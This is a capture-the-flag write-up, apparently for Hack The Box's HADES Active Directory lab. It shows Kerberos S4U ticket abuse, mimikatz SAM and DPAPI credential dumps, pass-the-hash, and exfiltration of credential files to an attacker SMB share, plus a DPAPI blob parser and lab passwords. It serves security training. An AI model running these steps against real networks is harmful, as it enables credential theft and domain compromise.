  v2.2.3

[*] Action: S4U

[*] Using rc4_hmac hash: 01300a3009c7ae1af0ea216ebada48ad
[*] Building AS-REQ (w/ preauth) for: 'htb.local\DEV$'
[*] Using domain controller: 192.168.3.203:88
[+] TGT request successful!
[*] base64(ticket.kirbi):



[*] Action: S4U

[*] Building S4U2self request for: 'DEV$@HTB.LOCAL'
[*] Using domain controller: dc1.htb.local (192.168.3.203)
[*] Sending S4U2self request to 192.168.3.203:88
[+] S4U2self success!
[*] Substituting alternative service name 'http/dev.htb.local'
[*] Got a TGS for 'administrator' to 'http@HTB.LOCAL'
[*] base64(ticket.kirbi):


[+] Ticket successfully imported!

PS C:\Users\pc1\Desktop>

Once it is imported, with Enter-PSSession we connect to dev.htb.local, which authenticates with the ticket, and we get a PowerShell as Administrator

PS C:\Users\pc1\Desktop> Enter-PSSession -ComputerName dev.htb.local  
[dev.htb.local]: PS C:\Users\Administrator\Documents> whoami
htb\administrator
[dev.htb.local]: PS C:\Users\Administrator\Documents>

From our Linux box we create an SMB share with impacket's smbserver, enabling SMBv2 support, where we share the compiled mimikatz.exe

❯ impacket-smbserver kali . -smb2support
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0  
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

In the Administrator session on dev.htb.local we copy mimikatz.exe over and use it to dump the machine's SAM so we can see the NTLM hashes

[dev.htb.local]: PS C:\Users\Administrator\Documents> cp \\10.10.14.10\kali\mimikatz.exe .
[dev.htb.local]: PS C:\Users\Administrator\Documents> .\mimikatz.exe 'token::elevate' 'lsadump::sam' exit

  .#####.   mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # token::elevate
Token Id  : 0
User name :
SID name  : NT AUTHORITY\SYSTEM

544     {0;000003e7} 1 D 35298          NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Primary
 -> Impersonated !
 * Process Token : {0;001327d5} 0 D 1314717     HTB\Administrator       S-1-5-21-4266912945-3985045794-2943778634-500  (14g,24p)        Primary  
 * Thread Token  : {0;000003e7} 1 D 1329433     NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Impersonation (Delegation)

mimikatz(commandline) # lsadump::sam
Domain : DEV
SysKey : e4b2298c95677ce18cd2198b9a36c7df
Local SID : S-1-5-21-4124311166-4116374192-336467615

SAMKey : bb3dbea7ca8bea043c6523bf5d915ae9

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 67bb396c79f56301b7dc5d219cc85d86

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 03fc719a49e2ead4264a2690b650d7f0

* Primary:Kerberos-Newer-Keys *
    Default Salt : DEV.HTB.LOCALAdministrator
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : a0e06c2d823c4ffc2249abfd6af36dc90733a7c395ee81094261caf3d6c2dbd1
      aes128_hmac       (4096) : 6cf34b183d3555966797dcd55e6128ba
      des_cbc_md5       (4096) : 202667ab89080ebf
    OldCredentials
      aes256_hmac       (4096) : 977755e7a9132c495b90fe59cf5471cd1187b9dab491dac0cb6d02bcc5e30740
      aes128_hmac       (4096) : e56a6fc47b432e347ad3d918056626fd
      des_cbc_md5       (4096) : 074aae9e5df751f1
    OlderCredentials
      aes256_hmac       (4096) : 9d211ec8e9afdb2bd168120abc6a97375b3aa14826b6b512236c16cc361cd290
      aes128_hmac       (4096) : 99caad607311ade6c51edf9bf0afdd08
      des_cbc_md5       (4096) : 547afdf27c165e3b

* Packages *
    NTLM-Strong-NTOWF

* Primary:Kerberos *
    Default Salt : DEV.HTB.LOCALAdministrator
    Credentials
      des_cbc_md5       : 202667ab89080ebf
    OldCredentials
      des_cbc_md5       : 074aae9e5df751f1


RID  : 000001f5 (501)
User : Guest

RID  : 000001f7 (503)
User : DefaultAccount

RID  : 000001f8 (504)
User : WDAGUtilityAccount

mimikatz(commandline) # exit
Bye!
[dev.htb.local]: PS C:\Users\Administrator\Documents>

Now that we have Administrator's NT hash we can verify it with crackmapexec using local authentication (--local-auth, since this is the local DEV account, not a domain one); the hash is valid for both SMB and WinRM.

❯ crackmapexec smb dev.htb.local -u Administrator -H 67bb396c79f56301b7dc5d219cc85d86 --local-auth
SMB         dev.htb.local   445    DEV              [*] Windows Server 2019 Standard 17763 x64 (name:DEV) (domain:DEV) (signing:False) (SMBv1:True)  
SMB         dev.htb.local   445    DEV              [+] DEV\Administrator:67bb396c79f56301b7dc5d219cc85d86 (Pwn3d!)

❯ crackmapexec winrm dev.htb.local -u Administrator -H 67bb396c79f56301b7dc5d219cc85d86 --local-auth
SMB         dev.htb.local   5985   DEV              [*] Windows 10.0 Build 17763 (name:DEV) (domain:DEV)
HTTP        dev.htb.local   5985   DEV              [*] http://dev.htb.local:5985/wsman
WINRM       dev.htb.local   5985   DEV              [+] DEV\Administrator:67bb396c79f56301b7dc5d219cc85d86 (Pwn3d!)

We can simply connect with evil-winrm using the hash (pass-the-hash) and read the flag.

❯ evil-winrm -i dev.htb.local -u Administrator -H 67bb396c79f56301b7dc5d219cc85d86  
PS C:\Users\Administrator\Documents> whoami
dev\administrator
PS C:\Users\Administrator\Documents> type ..\Desktop\flag.txt
HADES{Sp0ol_SeRv1ce_sO_Brok3n}
PS C:\Users\Administrator\Documents>


Resurrection

HADES{V5C_r3ve4L_DPaP1_s3cret5}


Listing the shadow copies with vssadmin, we find one for dev.htb.local.

PS C:\Users\Administrator\Documents> vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.

Contents of shadow copy set ID: {001689e5-f1a7-40a8-8b5b-8b6371bd07ca}
   Contained 1 shadow copies at creation time: 9/9/2019 3:10:57 AM
      Shadow Copy ID: {046396e4-6312-45b7-96cd-5e5f6fb017ef}
         Original Volume: (C:)\\?\Volume{21385651-0000-0000-0000-602200000000}\
         Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
         Originating Machine: dev.htb.local
         Service Machine: dev.htb.local
         Provider: 'Microsoft Software Shadow Copy provider 1.0'
         Type: ClientAccessible
         Attributes: Persistent, Client-accessible, No auto release, No writers, Differential  

PS C:\Users\Administrator\Documents>

To make it easier to reach, we create a symbolic link to the shadow copy so it can be accessed from C:\VSS, a somewhat shorter name.

PS C:\Users\Administrator\Documents> cmd /c mklink /d C:\VSS \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\  
symbolic link created for C:\VSS <<===>> \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
PS C:\Users\Administrator\Documents>

We use the mimikatz we uploaded earlier to dump the SAM again, but this time from the shadow copy; for that we pass it the absolute paths of the SYSTEM and SAM hives inside the copy.

PS C:\Users\Administrator\Documents> .\mimikatz.exe 'lsadump::sam /system:C:\VSS\Windows\System32\config\SYSTEM /sam:C:\VSS\Windows\System32\config\SAM' exit  

  .#####.   mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # lsadump::sam /system:C:\VSS\Windows\System32\config\SYSTEM /sam:C:\VSS\Windows\System32\config\SAM
Domain : DEV
SysKey : e4b2298c95677ce18cd2198b9a36c7df
Local SID : S-1-5-21-4124311166-4116374192-336467615

SAMKey : bb3dbea7ca8bea043c6523bf5d915ae9

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: de53e322ea95ac2723a2e3e149874aac

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : d9557883adf1e351ab19e287ce268464

* Primary:Kerberos-Newer-Keys *
    Default Salt : DEV.HTB.LOCALAdministrator
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 977755e7a9132c495b90fe59cf5471cd1187b9dab491dac0cb6d02bcc5e30740
      aes128_hmac       (4096) : e56a6fc47b432e347ad3d918056626fd
      des_cbc_md5       (4096) : 074aae9e5df751f1
    OldCredentials
      aes256_hmac       (4096) : 9d211ec8e9afdb2bd168120abc6a97375b3aa14826b6b512236c16cc361cd290
      aes128_hmac       (4096) : 99caad607311ade6c51edf9bf0afdd08
      des_cbc_md5       (4096) : 547afdf27c165e3b

* Packages *
    NTLM-Strong-NTOWF

* Primary:Kerberos *
    Default Salt : DEV.HTB.LOCALAdministrator
    Credentials
      des_cbc_md5       : 074aae9e5df751f1
    OldCredentials
      des_cbc_md5       : 547afdf27c165e3b


RID  : 000001f5 (501)
User : Guest

RID  : 000001f7 (503)
User : DefaultAccount

RID  : 000001f8 (504)
User : WDAGUtilityAccount

mimikatz(commandline) # exit
Bye!

PS C:\Users\Administrator\Documents>

The Administrator NT hash is different from the one we had: this is the previous Administrator password, since the Kerberos keys in this dump are exactly the OldCredentials of the live SAM dump above. Brute-forcing it with john (the hash saved to a file named hash) gives us the plaintext password.

❯ john -w:/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hash --format=NT  
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 128/128 XOP 4x2])
Press 'q' or Ctrl-C to abort, almost any other key for status
./*40ra26AZ      (?)
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed.

Listing the credentials in Administrator's profile inside the shadow copy, we find two.

PS C:\Users\Administrator\Documents> dir C:\VSS\Users\Administrator\AppData\Roaming\Microsoft\Credentials -force  

    Directory: C:\VSS\Users\Administrator\AppData\Roaming\Microsoft\Credentials

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a-hs-         9/9/2019   3:08 AM            474 1A2572C793495F694F64823A392D4718
-a-hs-         9/9/2019   3:07 AM            474 4A2EEB30EFC7958491B6578D9948EC7F

PS C:\Users\Administrator\Documents>

To decrypt the DPAPI credentials we need the masterkeys, which are under Protect in the folder named after the user's SID.

PS C:\Users\Administrator\Documents> dir C:\VSS\Users\Administrator\AppData\Roaming\Microsoft\Protect  

    Directory: C:\VSS\Users\Administrator\AppData\Roaming\Microsoft\Protect

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d---s-         9/8/2019  12:44 PM                S-1-5-21-4124311166-4116374192-336467615-500

PS C:\Users\Administrator\Documents> dir C:\VSS\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-4124311166-4116374192-336467615-500 -force  

    Directory: C:\VSS\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-4124311166-4116374192-336467615-500

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a-hs-         9/9/2019   3:07 AM            468 87790867-a883-4a2d-a467-019c315e1104
-a-hs-         9/8/2019  12:44 PM            468 dc6059f1-5ba2-4186-871a-0ff4055a6875
-a-hs-         9/9/2019   3:07 AM             24 Preferred

PS C:\Users\Administrator\Documents>

We start an SMB server again to receive all of those files from the machine.

❯ impacket-smbserver kali . -smb2support
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0  
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Now we copy the DPAPI credentials and the masterkeys to the SMB share we created.

PS C:\Users\Administrator\Documents> cp C:\VSS\Users\Administrator\AppData\Roaming\Microsoft\Credentials\1A2572C793495F694F64823A392D4718 \\10.10.14.10\kali\1A2572C793495F694F64823A392D4718
PS C:\Users\Administrator\Documents> cp C:\VSS\Users\Administrator\AppData\Roaming\Microsoft\Credentials\4A2EEB30EFC7958491B6578D9948EC7F \\10.10.14.10\kali\4A2EEB30EFC7958491B6578D9948EC7F
PS C:\Users\Administrator\Documents> cp C:\VSS\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-4124311166-4116374192-336467615-500\87790867-a883-4a2d-a467-019c315e1104 \\10.10.14.10\kali\87790867-a883-4a2d-a467-019c315e1104  
PS C:\Users\Administrator\Documents> cp C:\VSS\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-4124311166-4116374192-336467615-500\dc6059f1-5ba2-4186-871a-0ff4055a6875 \\10.10.14.10\kali\dc6059f1-5ba2-4186-871a-0ff4
PS C:\Users\Administrator\Documents>

Once the files are downloaded, to decrypt them we first copy the credentials and masterkeys to a Windows host in order to run mimikatz.

We start by decrypting the masterkey, giving the SID we saw earlier and the Administrator password we recovered from the shadow-copy SAM and cracked with john (the password that was current when the copy, and the masterkey, were created).

mimikatz # dpapi::masterkey /in:87790867-a883-4a2d-a467-019c315e1104 /sid:S-1-5-21-4124311166-4116374192-336467615-500 /password:./*40ra26AZ
**MASTERKEYS**
  dwVersion          : 00000002 - 2
  szGuid             : {87790867-a883-4a2d-a467-019c315e1104}
  dwFlags            : 00000005 - 5
  dwMasterKeyLen     : 000000b0 - 176
  dwBackupKeyLen     : 00000090 - 144
  dwCredHistLen      : 00000014 - 20
  dwDomainKeyLen     : 00000000 - 0
[masterkey]
  **MASTERKEY**
    dwVersion        : 00000002 - 2
    salt             : c41ab656df74c2a51cb872fa5a5be7fc
    rounds           : 00001f40 - 8000
    algHash          : 0000800e - 32782 (CALG_SHA_512)
    algCrypt         : 00006610 - 26128 (CALG_AES_256)
    pbKey            : bac9efb95aeb3796cabdb684ec758f5d32b0a9c564eb6f32b9a8de9c75d8ac677b6ce2b6da49875e2c04629a23260e7ac849955cc17aed002e3d1a0154ce86cb8faec38312fa7d65472dcdba7e4e79688558f3a185c4f5fbb8e09a24f3b9d48dbbe802eef159ca62a394354b15beb940eadeb014f82a09cb2e92eed7276facbb50c01177f5db0b76ed3f31fb877e3ec5  


[backupkey]
  **MASTERKEY**
    dwVersion        : 00000002 - 2
    salt             : 50cbeb0513a21c53150e9b0cad9bd772
    rounds           : 00001f40 - 8000
    algHash          : 0000800e - 32782 (CALG_SHA_512)
    algCrypt         : 00006610 - 26128 (CALG_AES_256)
    pbKey            : 8b123f98402a3bc524367f6b00f918ccf767054a961fb96de8be049705d016c86db0323c769623a64140e782c8e85dd101530208d3d169a85b35fd65276689042bbf4ed4e3984171799d97a99ff2bf53f4603593a058f39da49d537041204e58f0dc808efc132085c9f703ae3c6a7aab

[credhist]
  **CREDHIST INFO**
    dwVersion        : 00000003 - 3
    guid             : {26b08a5f-4b2c-420d-9843-d05ea57cd32f}



[masterkey] with password: ./*40ra26AZ (normal user)
  key : e0b92cbfbeab126231d979377ffd236b2ebd4b0704e2e9229d3ce82bebd144173b9f7160315d5af62289fae50a1fd465100aaf36748b68557e2b05edc25ac4fe
  sha1: dacd0e1ccaa03abd1ccb22ce058815624739a607

mimikatz #

When we do this, mimikatz keeps the decrypted masterkey and the credential derived from the password in its cache.

mimikatz # dpapi::cache

CREDENTIALS cache
=================
SID:S-1-5-21-4124311166-4116374192-336467615-500;GUID:{26b08a5f-4b2c-420d-9843-d05ea57cd32f};MD4:de53e322ea95ac2723a2e3e149874aac;SHA1:7cb14ea6f0ed4e5ed9ac0a6a167f088eeec2e09b;  

MASTERKEYS cache
================
GUID:{87790867-a883-4a2d-a467-019c315e1104};KeyHash:dacd0e1ccaa03abd1ccb22ce058815624739a607

DOMAINKEYS cache
================

mimikatz #

Then we just pass it the first of the two DPAPI credentials to decrypt it; its target is flag and its content is the flag's value.

mimikatz # dpapi::cred /in:1A2572C793495F694F64823A392D4718
**BLOB**
  dwVersion          : 00000001 - 1
  guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
  dwMasterKeyVersion : 00000001 - 1
  guidMasterKey      : {87790867-a883-4a2d-a467-019c315e1104}
  dwFlags            : 20000000 - 536870912 (system ; )
  dwDescriptionLen   : 0000003a - 58
  szDescription      : Enterprise Credential Data

  algCrypt           : 00006610 - 26128 (CALG_AES_256)
  dwAlgCryptLen      : 00000100 - 256
  dwSaltLen          : 00000020 - 32
  pbSalt             : 70fb047908ba7943f6933f49a289e407b87d8432e85bbe45ad9b91cee513bc9c
  dwHmacKeyLen       : 00000000 - 0
  pbHmackKey         :
  algHash            : 0000800e - 32782 (CALG_SHA_512)
  dwAlgHashLen       : 00000200 - 512
  dwHmac2KeyLen      : 00000020 - 32
  pbHmack2Key        : 9e73cba5176f1ba8bbd5a999eb9092e9371dfba4195d55d5e30b030e671206cb
  dwDataLen          : 000000c0 - 192
  pbData             : b55d72a3e4f00c4b103e5a23e6cb4bc97594204460d87cb7555dc700cd8c304050f0bac19475c4e9b0935d8808d7e6ef67d37d11ac43c6018bc59a8de680548c5e6f5f5344b4a9f9f0ea6fc3d6d847a72fbb97a54845c627e37b7aa368b4d6d24831af7cc2bcec6ac7d376651adb734bf93091eb034722cdd99974da553fa741eb5124394189e6018ad07543f796102adc5e3f81b28082350cab75ca407025a449eafc18c5795fe15e497df6a330ed64ca37f94df1b32dfb592f0562d1fabcce
  dwSignLen          : 00000040 - 64
  pbSign             : a0a7a1f7462b93455e6673f33d45742931269a9eb9666515a04852bdfcb78ad570352e10c78805356f8baf0751f33dcfb70b29a9c49eb10ec14121e815381196

Decrypting Credential:
 * volatile cache: GUID:{87790867-a883-4a2d-a467-019c315e1104};KeyHash:dacd0e1ccaa03abd1ccb22ce058815624739a607
**CREDENTIAL**
  credFlags      : 00000030 - 48
  credSize       : 000000b6 - 182
  credUnk0       : 00000000 - 0

  Type           : 00000002 - 2 - domain_password
  Flags          : 00000000 - 0
  LastWritten    : 09/09/2019 10:08:32 a. m.
  unkFlagsOrSize : 00000040 - 64
  Persist        : 00000003 - 3 - enterprise
  AttributeCount : 00000000 - 0
  unk0           : 00000000 - 0
  unk1           : 00000000 - 0
  TargetName     : Domain:target=flag
  UnkData        : (null)
  Comment        : (null)
  TargetAlias    : (null)
  UserName       : flag
  CredentialBlob : HADES{V5C_r3ve4L_DPaP1_s3cret5}
  Attributes     : 0

mimikatz #
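As an added example, not part of the original writeup, the Python block below parses the DPAPI_BLOB structure mimikatz printed above. It rebuilds a blob from the field values shown (the guidMasterKey, salt, HMAC key and signature are copied from the 1A2572C7... output; pbData is a constructed 192-byte placeholder, since only its length matters for parsing), parses it back, and answers the practical question of which file in Protect\<SID>\ is actually needed: the guidMasterKey inside the blob names it, so the second masterkey copied earlier (dc6059f1-...) was never required. The 12-byte header a file under Microsoft\Credentials carries in front of the blob is written in impacket's CREDENTIAL_FILE layout (version, blob size, reserved; version 1 is an assumption); with it the constructed file is 474 bytes, the size in the directory listing above.

```python
import struct
import uuid

# Constants visible in the dpapi::cred output: the CryptProtect "system" flag and the
# fixed DPAPI provider GUID every blob carries.
CRYPTPROTECT_SYSTEM = 0x20000000
DPAPI_PROVIDER = "df9d8cd0-1501-11d1-8c7a-00c04fc297eb"
CALG_NAMES = {0x6610: "CALG_AES_256", 0x800E: "CALG_SHA_512"}


def build_dpapi_blob(master_key_guid, description, salt, hmac2_key, data, sign,
                     flags=CRYPTPROTECT_SYSTEM, alg_crypt=0x6610, alg_hash=0x800E):
    """Serialise a DPAPI_BLOB in the same field order mimikatz prints it."""
    desc = description.encode("utf-16-le") + b"\x00\x00"        # szDescription: NUL-terminated UTF-16
    out = struct.pack("<I", 1)                                    # dwVersion
    out += uuid.UUID(DPAPI_PROVIDER).bytes_le                     # guidProvider, mixed-endian on disk
    out += struct.pack("<I", 1)                                   # dwMasterKeyVersion
    out += uuid.UUID(master_key_guid).bytes_le                    # guidMasterKey
    out += struct.pack("<II", flags, len(desc)) + desc            # dwFlags, dwDescriptionLen, szDescription
    out += struct.pack("<III", alg_crypt, 256, len(salt)) + salt  # algCrypt, dwAlgCryptLen (bits), pbSalt
    out += struct.pack("<I", 0)                                   # dwHmacKeyLen: empty in these blobs
    out += struct.pack("<III", alg_hash, 512, len(hmac2_key)) + hmac2_key
    out += struct.pack("<I", len(data)) + data                    # pbData: the ciphertext
    out += struct.pack("<I", len(sign)) + sign                    # pbSign: HMAC over the blob
    return out


def wrap_credential_file(blob):
    """Prepend the 12-byte header of a file under Microsoft\\Credentials (version, blob
    size, reserved; layout as impacket's CREDENTIAL_FILE, version value assumed to be 1)."""
    return struct.pack("<III", 1, len(blob), 0) + blob


def unwrap_credential_file(raw):
    """Inverse of wrap_credential_file; the size field must match the remaining bytes."""
    _version, size, _reserved = struct.unpack_from("<III", raw, 0)
    blob = raw[12:]
    if size != len(blob):
        raise ValueError("credential file size field does not match payload")
    return blob


def parse_dpapi_blob(blob):
    """Parse a DPAPI_BLOB into a dict; raises ValueError if any length runs past the end."""
    off = 0

    def u32():
        nonlocal off
        if off + 4 > len(blob):
            raise ValueError("truncated blob")
        (v,) = struct.unpack_from("<I", blob, off)
        off += 4
        return v

    def take(n):
        nonlocal off
        chunk = blob[off:off + n]
        if len(chunk) != n:
            raise ValueError("truncated blob")
        off += n
        return chunk

    r = {}
    r["version"] = u32()
    r["provider"] = str(uuid.UUID(bytes_le=take(16)))
    r["masterkey_version"] = u32()
    r["masterkey_guid"] = str(uuid.UUID(bytes_le=take(16)))
    r["flags"] = u32()
    r["description"] = take(u32()).decode("utf-16-le").rstrip("\x00\r\n")
    r["alg_crypt"], r["alg_crypt_len"] = u32(), u32()
    r["salt"] = take(u32())
    r["hmac_key"] = take(u32())
    r["alg_hash"], r["alg_hash_len"] = u32(), u32()
    r["hmac2_key"] = take(u32())
    r["data"] = take(u32())
    r["sign"] = take(u32())
    if off != len(blob):
        raise ValueError("trailing bytes after blob")
    r["system"] = bool(r["flags"] & CRYPTPROTECT_SYSTEM)
    r["alg_crypt_name"] = CALG_NAMES.get(r["alg_crypt"], hex(r["alg_crypt"]))
    r["alg_hash_name"] = CALG_NAMES.get(r["alg_hash"], hex(r["alg_hash"]))
    return r


def required_masterkey(blob, protect_dir_names):
    """Which file in Protect\\<SID>\\ this blob needs: the one named after its guidMasterKey."""
    guid = parse_dpapi_blob(blob)["masterkey_guid"]
    for name in protect_dir_names:
        if name.lower() == guid:
            return name
    raise LookupError(f"masterkey {guid} is not in this profile")


# Constructed sample: field values copied from the 1A2572C7... blob above, except pbData,
# which is a 192-byte placeholder (parsing only needs its length, not the real ciphertext).
SAMPLE_BLOB = build_dpapi_blob(
    master_key_guid="87790867-a883-4a2d-a467-019c315e1104",
    description="Enterprise Credential Data\r\n",
    salt=bytes.fromhex("70fb047908ba7943f6933f49a289e407b87d8432e85bbe45ad9b91cee513bc9c"),
    hmac2_key=bytes.fromhex("9e73cba5176f1ba8bbd5a999eb9092e9371dfba4195d55d5e30b030e671206cb"),
    data=bytes(range(192)),
    sign=bytes.fromhex("a0a7a1f7462b93455e6673f33d45742931269a9eb9666515a04852bdfcb78ad5"
                       "70352e10c78805356f8baf0751f33dcfb70b29a9c49eb10ec14121e815381196"),
)
SAMPLE_FILE = wrap_credential_file(SAMPLE_BLOB)
# The Protect\<SID> directory listing above, as constructed input
PROTECT_DIR = ["87790867-a883-4a2d-a467-019c315e1104", "dc6059f1-5ba2-4186-871a-0ff4055a6875", "Preferred"]

if __name__ == "__main__":
    info = parse_dpapi_blob(unwrap_credential_file(SAMPLE_FILE))
    print(info["masterkey_guid"], info["alg_crypt_name"], info["alg_hash_name"], info["description"])
    print("needs masterkey file:", required_masterkey(SAMPLE_BLOB, PROTECT_DIR))
```

Reading guidMasterKey before copying anything is the cheap way to know which masterkey file to exfiltrate; a LookupError here means the blob was protected by a masterkey from another profile or a system masterkey, and the user password alone will not decrypt it.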


Gateway

HADES{From_RBCD_To_p4s5word_v@Ult}


The other DPAPI credential shows the domain user test-svc as the username, and the credential content is its password.

mimikatz # dpapi::cred /in:4A2EEB30EFC7958491B6578D9948EC7F
**BLOB**
  dwVersion          : 00000001 - 1
  guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
  dwMasterKeyVersion : 00000001 - 1
  guidMasterKey      : {87790867-a883-4a2d-a467-019c315e1104}
  dwFlags            : 20000000 - 536870912 (system ; )
  dwDescriptionLen   : 0000003a - 58
  szDescription      : Enterprise Credential Data

  algCrypt           : 00006610 - 26128 (CALG_AES_256)
  dwAlgCryptLen      : 00000100 - 256
  dwSaltLen          : 00000020 - 32
  pbSalt             : fdb8e305b9dee0d4731a4e95af29273c2da220f0f7a5d41d83bfd14dff9f8cc5
  dwHmacKeyLen       : 00000000 - 0
  pbHmackKey         :
  algHash            : 0000800e - 32782 (CALG_SHA_512)
  dwAlgHashLen       : 00000200 - 512
  dwHmac2KeyLen      : 00000020 - 32
  pbHmack2Key        : c79494440e85f96dba9a8244ddef0a399ba44453dcfda0ae2a0e69349c0b0a0f
  dwDataLen          : 000000c0 - 192
  pbData             : b207f818a6599b2f7b4cbd9635bfa1658489e4ff501cd14d89187bea2e1ebafb01ce45bbc23100e8d3316c8ba0f02370ac09985027298520434cc9f607c52ce92bae597b54451f7f79b24b9c3184794927cbbccf0babde469ae281481a7e96b19c3131de62a77cb0f95604b02668aa9c54f04714c79843874f9a98131b8f22bfde94cfd011b1f3a56c1bab6e09ee0aa4e452d5b1c751d91659c11a0544cb6923bd9d891b07c432d844810a55a2dc3aa87db3452d2ad679c76532db453937c226  
  dwSignLen          : 00000040 - 64
  pbSign             : e59eba5fedeb1dab7d34f4e8392471dfed422e845bee3d5b83994d8c8fd4ce1b84b58550ca7514f28d5115a64bf6c5c830cbb40a5e213a519f829893186edbc0

Decrypting Credential:
 * volatile cache: GUID:{87790867-a883-4a2d-a467-019c315e1104};KeyHash:dacd0e1ccaa03abd1ccb22ce058815624739a607
**CREDENTIAL**
  credFlags      : 00000030 - 48
  credSize       : 000000ba - 186
  credUnk0       : 00000000 - 0

  Type           : 00000002 - 2 - domain_password
  Flags          : 00000000 - 0
  LastWritten    : 09/09/2019 10:07:12 a. m.
  unkFlagsOrSize : 00000028 - 40
  Persist        : 00000003 - 3 - enterprise
  AttributeCount : 00000000 - 0
  unk0           : 00000000 - 0
  unk1           : 00000000 - 0
  TargetName     : Domain:target=web
  UnkData        : (null)
  Comment        : (null)
  TargetAlias    : (null)
  UserName       : htb.local\test-svc
  CredentialBlob : T3st-S3v!ce-F0r-Pr0d
  Attributes     : 0

mimikatz #

We verify the credentials at the domain level with crackmapexec; they are valid.

❯ crackmapexec smb dc1.htb.local -u test-svc -p 'T3st-S3v!ce-F0r-Pr0d'
SMB         dc1.htb.local   445    DC1              [*] Windows 10.0 Build 17763 x64 (name:DC1) (domain:htb.local) (signing:True) (SMBv1:False)  
SMB         dc1.htb.local   445    DC1              [+] htb.local\test-svc:T3st-S3v!ce-F0r-Pr0d

To enumerate privileges and domain information we start by uploading the SharpHound.ps1 module using the upload function built into evil-winrm.

PS C:\Users\Administrator\Documents> upload SharpHound.ps1

Info: Uploading SharpHound.ps1 to C:\Users\Administrator\Documents\SharpHound.ps1  

Data: 1757460 bytes of 1757460 bytes copied

Info: Upload successful!

PS C:\Users\Administrator\Documents>

Since the credentials are also valid for LDAP, we import the SharpHound module and invoke it, passing it test-svc's credentials.

❯ crackmapexec ldap dc1.htb.local -u test-svc -p 'T3st-S3v!ce-F0r-Pr0d'
SMB         dc1.htb.local   445    DC1              [*] Windows 10.0 Build 17763 x64 (name:DC1) (domain:htb.local) (signing:True) (SMBv1:False)  
LDAP        dc1.htb.local   389    DC1              [+] htb.local\test-svc:T3st-S3v!ce-F0r-Pr0d

PS C:\Users\Administrator\Documents> Import-Module .\SharpHound.ps1
PS C:\Users\Administrator\Documents> Invoke-Bloodhound -CollectionMethod All -Domain htb.local -LdapUser 'test-svc' -LdapPassword 'T3st-S3v!ce-F0r-Pr0d'  
PS C:\Users\Administrator\Documents>

Running it creates a zip with all the domain information; we can simply download it with evil-winrm's download function as BH.zip.

PS C:\Users\Administrator\Documents> dir

    Directory: C:\Users\Administrator\Documents

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/27/2023   9:06 PM          12157 20230427210646_BloodHound.zip
-a----        4/27/2023   8:46 PM        1250056 mimikatz.exe
-a----        4/27/2023   9:03 PM        1318097 SharpHound.ps1

PS C:\Users\Administrator\Documents> download .\20230427210646_BloodHound.zip BH.zip  

Info: Downloading .\20230427210646_BloodHound.zip to BH.zip

Info: Download successful!

PS C:\Users\Administrator\Documents>

We load it into BloodHound and, looking at the object controls of the user test-svc, we find it has GenericAll over the computer web.htb.local.

To exploit it (resource-based constrained delegation, RBCD) we will need a few things, starting with the PowerView and Powermad modules, plus Rubeus to request and import a ticket at the end.

PS C:\Users\Administrator\Documents> upload PowerView.ps1

Info: Uploading PowerView.ps1 to C:\Users\Administrator\Documents\PowerView.ps1

Data: 1027036 bytes of 1027036 bytes copied

Info: Upload successful!

PS C:\Users\Administrator\Documents> upload Powermad.ps1

Info: Uploading Powermad.ps1 to C:\Users\Administrator\Documents\Powermad.ps1  

Data: 180768 bytes of 180768 bytes copied

Info: Upload successful!

PS C:\Users\Administrator\Documents> upload Rubeus.exe

Info: Uploading Rubeus.exe to C:\Users\Administrator\Documents\Rubeus.exe

Data: 595968 bytes of 595968 bytes copied

Info: Upload successful!

PS C:\Users\Administrator\Documents>

